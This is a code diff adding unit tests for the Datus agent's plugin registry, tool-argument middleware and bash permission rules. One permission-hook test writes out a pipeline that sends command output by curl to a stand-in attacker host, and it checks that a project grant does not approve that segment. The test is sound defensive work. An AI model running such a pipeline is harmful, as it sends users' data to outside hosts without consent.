+    _patch(monkeypatch, [_FakeEntryPoint("hello", _WithCliPerms), _FakeEntryPoint("hello", _Second)])
+    with caplog.at_level("WARNING"):
+        rules = registry.collect_plugin_cli_permissions()
+
+    assert rules["normal"].allow == ["datus hello greet:*", "datus hello version"]
+    assert "Duplicate" in caplog.text
+
+
+def test_cli_permissions_unsafe_entry_point_name_skipped(monkeypatch, caplog):
+    _patch(
+        monkeypatch,
+        [_FakeEntryPoint("evil name", _WithCliPerms), _FakeEntryPoint("*", _WithCliPerms)],
+    )
+    with caplog.at_level("WARNING"):
+        assert registry.collect_plugin_cli_permissions() == {}
+    assert "not a safe CLI token" in caplog.text
+
+
+def test_cli_permissions_broken_load_skipped(monkeypatch):
+    _patch(
+        monkeypatch,
+        [_FakeEntryPoint("broken", _WithCliPerms, raises=True), _FakeEntryPoint("hello", _WithCliPerms)],
+    )
+    rules = registry.collect_plugin_cli_permissions()
+    assert rules["normal"].allow == ["datus hello greet:*", "datus hello version"]
+
+
+def test_cli_permissions_entry_points_failure_returns_empty(monkeypatch):
+    def boom():
+        raise RuntimeError("entry_points exploded")
+
+    monkeypatch.setattr(importlib_metadata, "entry_points", boom)
+    assert registry.collect_plugin_cli_permissions() == {}
+
+
+# ---------------------------------------------------------------------------
+# Tests: collect_plugin_tool_transformers
+# ---------------------------------------------------------------------------
+
+
+def _sql_transformer(tool_name, args, context):
+    return args
+
+
+def _audit_transformer(tool_name, args, context):
+    return args
+
+
+class _WithTransformers(_Plugin):
+    @classmethod
+    def tool_transformers(cls):
+        return {"db_tools.execute_sql": _sql_transformer}
+
+
+class _WithTransformerList(_Plugin):
+    @classmethod
+    def tool_transformers(cls):
+        return {"execute_sql": [_audit_transformer, _sql_transformer]}
+
+
+def test_tool_transformers_collects_single_callable(monkeypatch):
+    _patch(monkeypatch, [_FakeEntryPoint("hello", _WithTransformers)])
+    collected = registry.collect_plugin_tool_transformers()
+    assert collected == {"db_tools.execute_sql": [_sql_transformer]}
+
+
+def test_tool_transformers_collects_callable_list(monkeypatch):
+    _patch(monkeypatch, [_FakeEntryPoint("hello", _WithTransformerList)])
+    collected = registry.collect_plugin_tool_transformers()
+    assert collected == {"execute_sql": [_audit_transformer, _sql_transformer]}
+
+
+def test_tool_transformers_accumulates_across_plugins(monkeypatch):
+    _patch(
+        monkeypatch,
+        [_FakeEntryPoint("a", _WithTransformers), _FakeEntryPoint("b", _WithTransformers)],
+    )
+    collected = registry.collect_plugin_tool_transformers()
+    assert collected == {"db_tools.execute_sql": [_sql_transformer, _sql_transformer]}
+
+
+def test_tool_transformers_plugin_without_hook_skipped(monkeypatch):
+    _patch(monkeypatch, [_FakeEntryPoint("hello", _Plugin)])
+    assert registry.collect_plugin_tool_transformers() == {}
+
+
+def test_tool_transformers_non_dict_declaration_skipped(monkeypatch, caplog):
+    class _BadShape(_Plugin):
+        @classmethod
+        def tool_transformers(cls):
+            return ["not", "a", "dict"]
+
+    _patch(monkeypatch, [_FakeEntryPoint("hello", _BadShape)])
+    with caplog.at_level("WARNING"):
+        assert registry.collect_plugin_tool_transformers() == {}
+    assert "must return a dict" in caplog.text
+
+
+def test_tool_transformers_raising_declaration_skipped(monkeypatch, caplog):
+    class _Raises(_Plugin):
+        @classmethod
+        def tool_transformers(cls):
+            raise RuntimeError("boom")
+
+    _patch(monkeypatch, [_FakeEntryPoint("hello", _Raises)])
+    with caplog.at_level("WARNING"):
+        assert registry.collect_plugin_tool_transformers() == {}
+    assert "tool_transformers() failed" in caplog.text
+
+
+def test_tool_transformers_non_callable_entries_skipped(monkeypatch, caplog):
+    class _Mixed(_Plugin):
+        @classmethod
+        def tool_transformers(cls):
+            return {"execute_sql": [_sql_transformer, "not-callable"], "other_tool": "also-not-callable"}
+
+    _patch(monkeypatch, [_FakeEntryPoint("hello", _Mixed)])
+    with caplog.at_level("WARNING"):
+        collected = registry.collect_plugin_tool_transformers()
+    assert collected == {"execute_sql": [_sql_transformer]}
+    assert "non-callable" in caplog.text
+
+
+def test_tool_transformers_invalid_pattern_skipped(monkeypatch, caplog):
+    class _BadPattern(_Plugin):
+        @classmethod
+        def tool_transformers(cls):
+            return {"": _sql_transformer, 42: _sql_transformer, "  ok  ": _sql_transformer}
+
+    _patch(monkeypatch, [_FakeEntryPoint("hello", _BadPattern)])
+    with caplog.at_level("WARNING"):
+        collected = registry.collect_plugin_tool_transformers()
+    assert collected == {"ok": [_sql_transformer]}
+    assert "invalid pattern" in caplog.text
+
+
+def test_tool_transformers_broken_plugin_skipped(monkeypatch):
+    _patch(
+        monkeypatch,
+        [_FakeEntryPoint("broken", _WithTransformers, raises=True), _FakeEntryPoint("ok", _WithTransformers)],
+    )
+    collected = registry.collect_plugin_tool_transformers()
+    assert collected == {"db_tools.execute_sql": [_sql_transformer]}
+
+
+def test_tool_transformers_entry_points_failure_returns_empty(monkeypatch):
+    def boom():
+        raise RuntimeError("entry_points exploded")
+
+    monkeypatch.setattr(importlib_metadata, "entry_points", boom)
+    assert registry.collect_plugin_tool_transformers() == {}

--- a/tests/unit_tests/tools/middleware/test_tool_middleware.py
+++ b/tests/unit_tests/tools/middleware/test_tool_middleware.py
@@ -1,0 +1,318 @@
+# Copyright 2025-present DatusAI, Inc.
+# Licensed under the Apache License, Version 2.0.
+# See http://www.apache.org/licenses/LICENSE-2.0 for details.
+
+"""Unit tests for the tool argument middleware.
+
+Covers the transformer contract end to end: rewrite propagation into the
+wrapped tool, fail-closed denial (exception and non-dict return), sync/async
+transformers, chaining order, malformed-argument passthrough, and the
+node-level ``apply_tool_transformers`` matching/skipping behavior.
+"""
+
+import asyncio
+import json
+from types import SimpleNamespace
+
+import pytest
+from agents import FunctionTool
+
+from datus.tools.middleware.tool_middleware import (
+    apply_tool_transformers,
+    wrap_tool_with_transformers,
+)
+from datus.tools.registry.tool_registry import ToolRegistry
+
+
+def _make_tool(name="execute_sql", record=None):
+    """Build a FunctionTool that records the args JSON it was invoked with."""
+
+    async def invoke(tool_ctx, args_str):
+        if record is not None:
+            record.append(args_str)
+        return {"success": 1, "result": f"ran:{args_str}", "error": None}
+
+    return FunctionTool(
+        name=name,
+        description="test tool",
+        params_json_schema={"type": "object", "properties": {"sql": {"type": "string"}}},
+        on_invoke_tool=invoke,
+        strict_json_schema=False,
+    )
+
+
+def _run(coro):
+    return asyncio.run(coro)
+
+
+@pytest.mark.ci
+class TestWrapToolWithTransformers:
+    def test_rewrite_reaches_original_tool(self):
+        record = []
+        tool = _make_tool(record=record)
+
+        def add_scope(tool_name, args, context):
+            assert tool_name == "execute_sql"
+            args["sql"] = args["sql"] + " WHERE tenant_id = 't1'"
+            return args
+
+        wrapped = wrap_tool_with_transformers(tool, [add_scope])
+        result = _run(wrapped.on_invoke_tool(None, json.dumps({"sql": "SELECT * FROM orders"})))
+
+        assert result["success"] == 1
+        assert json.loads(record[0]) == {"sql": "SELECT * FROM orders WHERE tenant_id = 't1'"}
+
+    def test_wrapped_tool_preserves_metadata(self):
+        tool = _make_tool()
+        wrapped = wrap_tool_with_transformers(tool, [lambda n, a, c: a])
+        assert wrapped.name == tool.name
+        assert wrapped.description == tool.description
+        assert wrapped.params_json_schema == tool.params_json_schema
+        assert wrapped.strict_json_schema == tool.strict_json_schema
+
+    def test_wrapped_tool_preserves_disabled_state(self):
+        # Rebuilding the FunctionTool must not silently re-enable a tool that
+        # was intentionally disabled/gated just because it matched a pattern.
+        tool = _make_tool()
+        tool.is_enabled = False
+        wrapped = wrap_tool_with_transformers(tool, [lambda n, a, c: a])
+        assert wrapped.is_enabled is False
+
+    def test_transformer_exception_denies_fail_closed(self):
+        record = []
+        tool = _make_tool(record=record)
+
+        def deny(tool_name, args, context):
+            raise ValueError("tenant scope missing")
+
+        wrapped = wrap_tool_with_transformers(tool, [deny])
+        result = _run(wrapped.on_invoke_tool(None, json.dumps({"sql": "SELECT 1"})))
+
+        assert result["success"] == 0
+        assert "tenant scope missing" in result["error"]
+        assert result["result"] is None
+        assert record == []  # original tool never executed
+
+    def test_non_dict_return_denies_fail_closed(self):
+        record = []
+        tool = _make_tool(record=record)
+        wrapped = wrap_tool_with_transformers(tool, [lambda n, a, c: "not a dict"])
+        result = _run(wrapped.on_invoke_tool(None, json.dumps({"sql": "SELECT 1"})))
+
+        assert result["success"] == 0
+        assert "str" in result["error"]
+        assert record == []
+
+    def test_async_transformer_supported(self):
+        record = []
+        tool = _make_tool(record=record)
+
+        async def async_rewrite(tool_name, args, context):
+            args["sql"] = "SELECT 2"
+            return args
+
+        wrapped = wrap_tool_with_transformers(tool, [async_rewrite])
+        result = _run(wrapped.on_invoke_tool(None, json.dumps({"sql": "SELECT 1"})))
+
+        assert result["success"] == 1
+        assert json.loads(record[0]) == {"sql": "SELECT 2"}
+
+    def test_transformers_chain_in_order(self):
+        record = []
+        tool = _make_tool(record=record)
+
+        def first(tool_name, args, context):
+            args["sql"] = args["sql"] + "|first"
+            return args
+
+        def second(tool_name, args, context):
+            args["sql"] = args["sql"] + "|second"
+            return args
+
+        wrapped = wrap_tool_with_transformers(tool, [first, second])
+        _run(wrapped.on_invoke_tool(None, json.dumps({"sql": "base"})))
+
+        assert json.loads(record[0]) == {"sql": "base|first|second"}
+
+    def test_chain_stops_at_first_denial(self):
+        record = []
+        calls = []
+        tool = _make_tool(record=record)
+
+        def deny(tool_name, args, context):
+            calls.append("deny")
+            raise PermissionError("blocked")
+
+        def never(tool_name, args, context):
+            calls.append("never")
+            return args
+
+        wrapped = wrap_tool_with_transformers(tool, [deny, never])
+        result = _run(wrapped.on_invoke_tool(None, json.dumps({"sql": "SELECT 1"})))
+
+        assert result["success"] == 0
+        assert calls == ["deny"]
+        assert record == []
+
+    def test_malformed_json_passes_through_untouched(self):
+        record = []
+        tool = _make_tool(record=record)
+
+        def never(tool_name, args, context):
+            raise AssertionError("transformer must not run on malformed args")
+
+        wrapped = wrap_tool_with_transformers(tool, [never])
+        result = _run(wrapped.on_invoke_tool(None, "{not json"))
+
+        assert result["success"] == 1
+        assert record == ["{not json"]
+
+    def test_non_object_json_passes_through_untouched(self):
+        record = []
+        tool = _make_tool(record=record)
+        wrapped = wrap_tool_with_transformers(tool, [lambda n, a, c: a])
+        _run(wrapped.on_invoke_tool(None, json.dumps([1, 2])))
+        assert record == ["[1, 2]"]
+
+    def test_context_provider_called_per_invocation(self):
+        tool = _make_tool()
+        principal_holder = {"tenant": "t1"}
+        seen = []
+
+        def transformer(tool_name, args, context):
+            seen.append(context["principal"])
+            return args
+
+        wrapped = wrap_tool_with_transformers(tool, [transformer], lambda: {"principal": dict(principal_holder)})
+        _run(wrapped.on_invoke_tool(None, "{}"))
+        principal_holder["tenant"] = "t2"
+        _run(wrapped.on_invoke_tool(None, "{}"))
+
+        assert seen == [{"tenant": "t1"}, {"tenant": "t2"}]
+
+    def test_context_provider_failure_yields_empty_context(self):
+        tool = _make_tool()
+        seen = []
+
+        def transformer(tool_name, args, context):
+            seen.append(context)
+            return args
+
+        def broken_provider():
+            raise RuntimeError("no context")
+
+        wrapped = wrap_tool_with_transformers(tool, [transformer], broken_provider)
+        result = _run(wrapped.on_invoke_tool(None, "{}"))
+
+        assert result["success"] == 1
+        assert seen == [{}]
+
+    def test_non_ascii_args_survive_roundtrip(self):
+        record = []
+        tool = _make_tool(record=record)
+        wrapped = wrap_tool_with_transformers(tool, [lambda n, a, c: a])
+        _run(wrapped.on_invoke_tool(None, json.dumps({"sql": "SELECT '租户'"}, ensure_ascii=False)))
+        assert json.loads(record[0]) == {"sql": "SELECT '租户'"}
+
+
+def _make_node(tools, registry_map=None, proxied=None):
+    return SimpleNamespace(
+        tools=tools,
+        tool_registry=ToolRegistry(registry_map or {}),
+        proxied_tool_names=proxied or set(),
+        get_node_name=lambda: "chat",
+        db_func_tool=SimpleNamespace(principal={"tenant": {"id": "t1"}}),
+        agent_config=SimpleNamespace(project_root="/proj"),
+    )
+
+
+@pytest.mark.ci
+class TestApplyToolTransformers:
+    def test_wraps_matching_tool_by_name(self):
+        record = []
+        node = _make_node([_make_tool("execute_sql", record), _make_tool("read_file")])
+
+        def rewrite(tool_name, args, context):
+            args["sql"] = "REWRITTEN"
+            return args
+
+        wrapped_count = apply_tool_transformers(node, {"execute_sql": [rewrite]})
+
+        assert wrapped_count == 1
+        _run(node.tools[0].on_invoke_tool(None, json.dumps({"sql": "x"})))
+        assert json.loads(record[0]) == {"sql": "REWRITTEN"}
+
+    def test_category_wildcard_uses_registry(self):
+        node = _make_node(
+            [_make_tool("execute_sql"), _make_tool("read_file")],
+            registry_map={"execute_sql": "db_tools", "read_file": "filesystem_tools"},
+        )
+        wrapped_count = apply_tool_transformers(node, {"db_tools.*": [lambda n, a, c: a]})
+        assert wrapped_count == 1
+
+    def test_skips_proxied_tools(self):
+        node = _make_node([_make_tool("execute_sql")], proxied={"execute_sql"})
+        wrapped_count = apply_tool_transformers(node, {"execute_sql": [lambda n, a, c: a]})
+        assert wrapped_count == 0
+
+    def test_empty_mapping_is_noop(self):
+        tool = _make_tool("execute_sql")
+        node = _make_node([tool])
+        assert apply_tool_transformers(node, {}) == 0
+        assert node.tools[0] is tool
+
+    def test_non_function_tools_preserved(self):
+        sentinel = object()
+        node = _make_node([sentinel, _make_tool("execute_sql")])
+        wrapped_count = apply_tool_transformers(node, {"execute_sql": [lambda n, a, c: a]})
+        assert wrapped_count == 1
+        assert node.tools[0] is sentinel
+
+    def test_context_carries_node_fields(self):
+        seen = {}
+
+        def transformer(tool_name, args, context):
+            seen.update(context)
+            return args
+
+        node = _make_node([_make_tool("execute_sql")])
+        apply_tool_transformers(node, {"execute_sql": [transformer]})
+        _run(node.tools[0].on_invoke_tool(None, "{}"))
+
+        assert seen["node_name"] == "chat"
+        assert seen["principal"] == {"tenant": {"id": "t1"}}
+        assert seen["project_root"] == "/proj"
+        assert seen["agent_config"] is node.agent_config
+
+    def test_principal_read_fresh_per_call(self):
+        seen = []
+
+        def transformer(tool_name, args, context):
+            seen.append(context["principal"])
+            return args
+
+        node = _make_node([_make_tool("execute_sql")])
+        apply_tool_transformers(node, {"execute_sql": [transformer]})
+        _run(node.tools[0].on_invoke_tool(None, "{}"))
+        node.db_func_tool.principal = {"tenant": {"id": "t2"}}
+        _run(node.tools[0].on_invoke_tool(None, "{}"))
+
+        assert seen == [{"tenant": {"id": "t1"}}, {"tenant": {"id": "t2"}}]
+
+    def test_multiple_patterns_accumulate_on_one_tool(self):
+        record = []
+        node = _make_node([_make_tool("execute_sql", record)], registry_map={"execute_sql": "db_tools"})
+
+        def first(tool_name, args, context):
+            args["sql"] = args["sql"] + "|byname"
+            return args
+
+        def second(tool_name, args, context):
+            args["sql"] = args["sql"] + "|bycat"
+            return args
+
+        wrapped_count = apply_tool_transformers(node, {"execute_sql": [first], "db_tools.*": [second]})
+        assert wrapped_count == 1
+        _run(node.tools[0].on_invoke_tool(None, json.dumps({"sql": "base"})))
+        assert json.loads(record[0])["sql"].startswith("base|")
+        assert set(json.loads(record[0])["sql"].split("|")[1:]) == {"byname", "bycat"}

--- a/tests/unit_tests/tools/permission/test_bash_rules.py
+++ b/tests/unit_tests/tools/permission/test_bash_rules.py
@@ -244,6 +244,13 @@ class TestSessionBuckets:
         decision = evaluate_bash_command("git push origin main", BashCommandRules())
         assert decision.bucket == "git push"
 
+    def test_datus_buckets_per_plugin_namespace(self):
+        # ``datus`` is a group command: approving one plugin's namespace must
+        # not green-light another plugin's.
+        assert session_bucket_for(argv("datus hello greet world"), None) == "datus hello"
+        assert session_bucket_for(argv("datus other doit"), None) == "datus other"
+        assert session_bucket_for(argv("datus --help"), None) == "datus"
+
 
 class TestBashCommandRulesModel:
     """Tests for from_dict / merge_with / is_empty."""
@@ -420,3 +427,85 @@ class TestPipelineEvaluation:
         assert d.level == PermissionLevel.ASK
         assert d.source == BashDecisionSource.SAFETY
         assert d.safety_forced is True
+
+    def test_ask_pipeline_carries_all_non_allow_segments(self):
+        """The hook's project-grant bypass must see EVERY non-allow segment,
+        not just the representative one."""
+        rules = BashCommandRules(allow=["cat:*"], ask=["docker:*"])
+        d = evaluate_bash_command("frobnicate | docker ps | cat x", rules)
+        assert d.segment_ask_patterns == (
+            (BashDecisionSource.DEFAULT, None),
+            (BashDecisionSource.ASK_RULE, "docker:*"),
+        )
+
+    def test_single_command_has_no_segment_patterns(self):
+        rules = BashCommandRules(ask=["docker:*"])
+        d = evaluate_bash_command("docker ps", rules)
+        assert d.segment_ask_patterns is None
+
+
+class TestDatusProfileFlagNormalization:
+    """Leading ``--profile`` datus globals must not defeat plugin rules."""
+
+    RULES = BashCommandRules(
+        allow=["datus hello greet:*"],
+        ask=["datus hello config set:*"],
+        deny=["datus hello config wipe:*"],
+    )
+
+    def test_deny_matches_profile_qualified_raw_argv(self):
+        """Deny rules additionally match the RAW (pre-normalization) argv so a
+        user can fence off a specific plugin profile even though ask/allow
+        matching sees through the ``--profile`` flag."""
+        rules = BashCommandRules(allow=["datus hello greet:*"], deny=["datus hello --profile prod:*"])
+        d = evaluate_bash_command("datus hello --profile prod greet Ada", rules)
+        assert d.level == PermissionLevel.DENY
+        assert d.matched_pattern == "datus hello --profile prod:*"
+        # Other profiles are unaffected by the profile-scoped deny.
+        d = evaluate_bash_command("datus hello --profile dev greet Ada", rules)
+        assert d.level == PermissionLevel.ALLOW
+
+    def test_profile_space_form_matches_allow(self):
+        d = evaluate_bash_command("datus hello --profile prod greet Ada", self.RULES)
+        assert d.level == PermissionLevel.ALLOW
+        assert d.matched_pattern == "datus hello greet:*"
+
+    def test_profile_equals_form_matches_ask_with_pattern_bucket(self):
+        d = evaluate_bash_command("datus hello --profile=prod config set k v", self.RULES)
+        assert d.level == PermissionLevel.ASK
+        assert d.matched_pattern == "datus hello config set:*"
+        assert d.bucket == "datus hello config set:*"
+
+    def test_profile_flag_cannot_dodge_deny(self):
+        d = evaluate_bash_command("datus hello --profile prod config wipe all", self.RULES)
+        assert d.level == PermissionLevel.DENY
+        assert d.matched_pattern == "datus hello config wipe:*"
+
+    def test_repeated_profile_flags_all_stripped(self):
+        d = evaluate_bash_command("datus hello --profile a --profile=b greet Ada", self.RULES)
+        assert d.level == PermissionLevel.ALLOW
+
+    def test_config_flag_is_not_stripped(self):
+        # ``--config`` rebinds credentials/endpoints; commands carrying it
+        # fall through to the default decision instead of matching rules.
+        d = evaluate_bash_command("datus hello --config /tmp/x.yml config set k v", self.RULES)
+        assert d.level == PermissionLevel.ASK
+        assert d.matched_pattern is None
+        assert d.bucket == "datus hello"
+
+    def test_subcommand_position_profile_belongs_to_plugin(self):
+        # From the first command token onward flags belong to the plugin;
+        # ``greet:*`` covers the remainder, no stripping involved.
+        d = evaluate_bash_command("datus hello config set --profile x", self.RULES)
+        assert d.level == PermissionLevel.ASK
+        assert d.matched_pattern == "datus hello config set:*"
+
+    def test_trailing_profile_without_value_left_alone(self):
+        d = evaluate_bash_command("datus hello --profile", self.RULES)
+        assert d.level == PermissionLevel.ASK
+        assert d.matched_pattern is None
+
+    def test_non_datus_commands_untouched(self):
+        rules = BashCommandRules(allow=["git greet:*"])
+        d = evaluate_bash_command("git --profile prod greet", rules)
+        assert d.level == PermissionLevel.ASK  # no normalization outside datus

--- a/tests/unit_tests/tools/permission/test_permission_hooks.py
+++ b/tests/unit_tests/tools/permission/test_permission_hooks.py
@@ -2321,3 +2321,255 @@ class TestBashPipelinePermission:
 
         with pytest.raises(PermissionDeniedException):
             await hooks.on_tool_start(self._ctx("cat x | frobnicate"), MagicMock(), self._tool())
+
+
+class TestPluginCliBashPermission:
+    """End-to-end: plugin-declared CLI rules gate ``datus <plugin> ...`` commands."""
+
+    def _make_hooks(self, mock_broker, project_bash_allows=None, non_interactive=False):
+        from datus.tools.permission.bash_rules import BashCommandRules
+        from datus.tools.permission.profiles import build_effective_config
+
+        registry = ToolRegistry()
+        tool_mock = MagicMock()
+        tool_mock.name = "bash"
+        registry.register_tools("bash_tools", [tool_mock])
+        plugin_rules = BashCommandRules(
+            allow=["datus hello greet:*"],
+            ask=["datus hello config set:*"],
+            deny=["datus hello config wipe:*"],
+        )
+        config = build_effective_config("normal", None, plugin_bash_rules=plugin_rules)
+        manager = PermissionManager(
+            global_config=config,
+            active_profile="normal",
+            plugin_bash_rules={"normal": plugin_rules},
+            project_bash_allows=project_bash_allows,
+        )
+        hooks = PermissionHooks(
+            broker=mock_broker,
+            permission_manager=manager,
+            node_name="chat",
+            tool_registry=registry,
+            non_interactive=non_interactive,
+        )
+        return hooks, manager
+
+    @staticmethod
+    def _ctx(command):
+        import json
+
+        ctx = MagicMock()
+        ctx.tool_arguments = json.dumps({"command": command})
+        return ctx
+
+    @staticmethod
+    def _tool():
+        t = MagicMock()
+        t.name = "bash"
+        return t
+
+    @pytest.mark.asyncio
+    async def test_plugin_allow_rule_bypasses_prompt(self, mock_broker):
+        hooks, _ = self._make_hooks(mock_broker)
+
+        await hooks.on_tool_start(self._ctx("datus hello greet Ada"), MagicMock(), self._tool())
+
+        mock_broker.request.assert_not_called()
+
+    @pytest.mark.asyncio
+    async def test_plugin_ask_rule_prompts_with_pattern_bucket(self, mock_broker):
+        hooks, manager = self._make_hooks(mock_broker)
+        mock_broker.request = AsyncMock(return_value=[["a"]])
+
+        await hooks.on_tool_start(self._ctx("datus hello config set greeting Hi"), MagicMock(), self._tool())
+
+        assert mock_broker.request.await_count == 1
+        event = mock_broker.request.await_args.args[0][0]
+        # Ask-rule hit: the session bucket is the matched pattern. Because the
+        # ask rule is PLUGIN-declared, the project-persist option IS offered.
+        assert "datus hello config set:*" in event.choices["a"]
+        assert "p" in event.choices
+        assert "datus hello config set:*" in event.choices["p"]
+        assert manager._session_approvals.get("bash_tools.bash::datus hello config set:*") is True
+
+        # Same bucket: second call skips the prompt.
+        await hooks.on_tool_start(self._ctx("datus hello config set tone loud"), MagicMock(), self._tool())
+        assert mock_broker.request.await_count == 1
+
+    @pytest.mark.asyncio
+    async def test_plugin_deny_rule_raises(self, mock_broker):
+        hooks, _ = self._make_hooks(mock_broker)
+
+        with pytest.raises(PermissionDeniedException, match="datus hello config wipe"):
+            await hooks.on_tool_start(self._ctx("datus hello config wipe all"), MagicMock(), self._tool())
+
+        mock_broker.request.assert_not_called()
+
+    @pytest.mark.asyncio
+    async def test_unmatched_plugin_command_asks_with_namespace_bucket(self, mock_broker):
+        hooks, manager = self._make_hooks(mock_broker)
+        mock_broker.request = AsyncMock(return_value=[["a"]])
+
+        await hooks.on_tool_start(self._ctx("datus other doit"), MagicMock(), self._tool())
+
+        # No rule matched: session bucket is the two-token group ``datus other``,
+        # so approving it never green-lights ``datus hello``.
+        assert manager._session_approvals.get("bash_tools.bash::datus other") is True
+        mock_broker.request = AsyncMock(return_value=[["n"]])
+        with pytest.raises(PermissionDeniedException):
+            await hooks.on_tool_start(self._ctx("datus hello config set x y"), MagicMock(), self._tool())
+
+    @pytest.mark.asyncio
+    async def test_plugin_ask_project_choice_persists_pattern_verbatim(self, mock_broker):
+        from unittest.mock import patch
+
+        hooks, manager = self._make_hooks(mock_broker)
+        mock_broker.request = AsyncMock(return_value=[["p"]])
+
+        with patch("datus.configuration.project_config.append_project_bash_allow") as persist:
+            await hooks.on_tool_start(self._ctx("datus hello config set greeting Hi"), MagicMock(), self._tool())
+
+        # The matched ask pattern is persisted verbatim (already contains ':').
+        persist.assert_called_once()
+        assert persist.call_args.args[0] == "datus hello config set:*"
+        assert manager.has_project_bash_grant("datus hello config set:*")
+
+        # Same command later this session: no prompt (session bucket + grant).
+        await hooks.on_tool_start(self._ctx("datus hello config set tone loud"), MagicMock(), self._tool())
+        assert mock_broker.request.await_count == 1
+
+    @pytest.mark.asyncio
+    async def test_project_grant_bypasses_plugin_ask_after_restart(self, mock_broker):
+        """A persisted grant loaded from .datus/config.yml silences the ask rule."""
+        hooks, _ = self._make_hooks(mock_broker, project_bash_allows=["datus hello config set:*"])
+
+        await hooks.on_tool_start(self._ctx("datus hello config set greeting Hi"), MagicMock(), self._tool())
+
+        mock_broker.request.assert_not_called()
+
+    @pytest.mark.asyncio
+    async def test_project_grant_bypasses_ask_even_non_interactive(self, mock_broker):
+        hooks, _ = self._make_hooks(mock_broker, project_bash_allows=["datus hello config set:*"], non_interactive=True)
+
+        await hooks.on_tool_start(self._ctx("datus hello config set greeting Hi"), MagicMock(), self._tool())
+
+        mock_broker.request.assert_not_called()
+
+    @pytest.mark.asyncio
+    async def test_project_grant_is_exact_match_only(self, mock_broker):
+        """A broader hand-written grant never silences a narrower ask rule."""
+        hooks, _ = self._make_hooks(mock_broker, project_bash_allows=["datus hello:*"])
+        mock_broker.request = AsyncMock(return_value=[["y"]])
+
+        await hooks.on_tool_start(self._ctx("datus hello config set greeting Hi"), MagicMock(), self._tool())
+
+        assert mock_broker.request.await_count == 1
+
+    @pytest.mark.asyncio
+    async def test_user_authored_ask_rule_gets_no_project_option(self, mock_broker):
+        """Ask rules NOT declared by a plugin keep the old three-choice prompt."""
+        from datus.tools.permission.bash_rules import BashCommandRules
+        from datus.tools.permission.profiles import build_effective_config
+
+        registry = ToolRegistry()
+        tool_mock = MagicMock()
+        tool_mock.name = "bash"
+        registry.register_tools("bash_tools", [tool_mock])
+        config = build_effective_config("normal", {"bash_commands": {"ask": ["docker:*"]}})
+        manager = PermissionManager(
+            global_config=config,
+            active_profile="normal",
+            plugin_bash_rules={"normal": BashCommandRules(ask=["datus hello config set:*"])},
+        )
+        hooks = PermissionHooks(
+            broker=mock_broker, permission_manager=manager, node_name="chat", tool_registry=registry
+        )
+        mock_broker.request = AsyncMock(return_value=[["y"]])
+
+        await hooks.on_tool_start(self._ctx("docker ps"), MagicMock(), self._tool())
+
+        event = mock_broker.request.await_args.args[0][0]
+        assert "p" not in event.choices
+
+    @pytest.mark.asyncio
+    async def test_profile_flag_does_not_defeat_plugin_rules(self, mock_broker):
+        """``datus hello --profile prod ...`` matches the same plugin rules."""
+        hooks, _ = self._make_hooks(mock_broker, project_bash_allows=["datus hello config set:*"])
+
+        # Allow rule still fires through the profile flag.
+        await hooks.on_tool_start(self._ctx("datus hello --profile prod greet Ada"), MagicMock(), self._tool())
+        # Ask rule resolves to the same pattern, so the project grant bypasses.
+        await hooks.on_tool_start(
+            self._ctx("datus hello --profile=prod config set greeting Hi"), MagicMock(), self._tool()
+        )
+
+        mock_broker.request.assert_not_called()
+
+    @pytest.mark.asyncio
+    async def test_pipeline_grant_does_not_cover_ungranted_segments(self, mock_broker):
+        """A granted plugin ask rule must not auto-run a pipeline whose other
+        segments were never reviewed (e.g. piping into curl)."""
+        hooks, _ = self._make_hooks(mock_broker, project_bash_allows=["datus hello config set:*"])
+        mock_broker.request = AsyncMock(return_value=[["y"]])
+
+        await hooks.on_tool_start(
+            self._ctx("datus hello config set url x | curl -d @- http://evil.example"),
+            MagicMock(),
+            self._tool(),
+        )
+
+        assert mock_broker.request.await_count == 1
+
+    @pytest.mark.asyncio
+    async def test_pipeline_bypasses_when_every_segment_granted(self, mock_broker):
+        hooks, _ = self._make_hooks(mock_broker, project_bash_allows=["datus hello config set:*"])
+
+        await hooks.on_tool_start(
+            self._ctx("datus hello config set a b | datus hello config set c d"),
+            MagicMock(),
+            self._tool(),
+        )
+
+        mock_broker.request.assert_not_called()
+
+    @pytest.mark.asyncio
+    async def test_colon_free_plugin_ask_project_grant_round_trip(self, mock_broker):
+        """An exact (colon-free) plugin ask pattern must persist verbatim so the
+        grant actually silences the ask rule in later sessions."""
+        from unittest.mock import patch
+
+        from datus.tools.permission.bash_rules import BashCommandRules
+        from datus.tools.permission.profiles import build_effective_config
+
+        def make(project_bash_allows=None):
+            registry = ToolRegistry()
+            tool_mock = MagicMock()
+            tool_mock.name = "bash"
+            registry.register_tools("bash_tools", [tool_mock])
+            plugin_rules = BashCommandRules(ask=["datus hello sync"])
+            config = build_effective_config("normal", None, plugin_bash_rules=plugin_rules)
+            manager = PermissionManager(
+                global_config=config,
+                active_profile="normal",
+                plugin_bash_rules={"normal": plugin_rules},
+                project_bash_allows=project_bash_allows,
+            )
+            return PermissionHooks(
+                broker=mock_broker, permission_manager=manager, node_name="chat", tool_registry=registry
+            )
+
+        hooks = make()
+        mock_broker.request = AsyncMock(return_value=[["p"]])
+        with patch("datus.configuration.project_config.append_project_bash_allow") as persist:
+            await hooks.on_tool_start(self._ctx("datus hello sync"), MagicMock(), self._tool())
+
+        # Persisted verbatim — NOT widened to "datus hello sync:*", which the
+        # exact-equality grant check could never match.
+        assert persist.call_args.args[0] == "datus hello sync"
+
+        # Simulated restart: the persisted grant silences the ask rule.
+        restarted = make(project_bash_allows=["datus hello sync"])
+        mock_broker.request = AsyncMock(return_value=[["y"]])
+        await restarted.on_tool_start(self._ctx("datus hello sync"), MagicMock(), self._tool())
+        mock_broker.request.assert_not_called()

--- a/tests/unit_tests/tools/permission/test_permission_manager.py
+++ b/tests/unit_tests/tools/permission/test_permission_manager.py
@@ -555,3 +555,130 @@ class TestPermissionManagerProjectBashAllows:
         mgr = self._manager_with_grant()
         mgr.switch_profile("auto")
         assert "make:*" in mgr.global_config.bash_commands.allow
+
+
+class TestPermissionManagerPluginBashRules:
+    """Plugin-declared bash rules survive runtime profile switches."""
+
+    @staticmethod
+    def _plugin_rules_map():
+        from datus.tools.permission.bash_rules import BashCommandRules
+
+        return {
+            "normal": BashCommandRules(allow=["datus hello greet:*"], ask=["datus hello config set:*"]),
+            "auto": BashCommandRules(allow=["datus hello:*"]),
+        }
+
+    def _manager(self):
+        from datus.tools.permission.profiles import build_effective_config
+
+        rules_map = self._plugin_rules_map()
+        return PermissionManager(
+            global_config=build_effective_config("normal", None, plugin_bash_rules=rules_map["normal"]),
+            active_profile="normal",
+            plugin_bash_rules=rules_map,
+        )
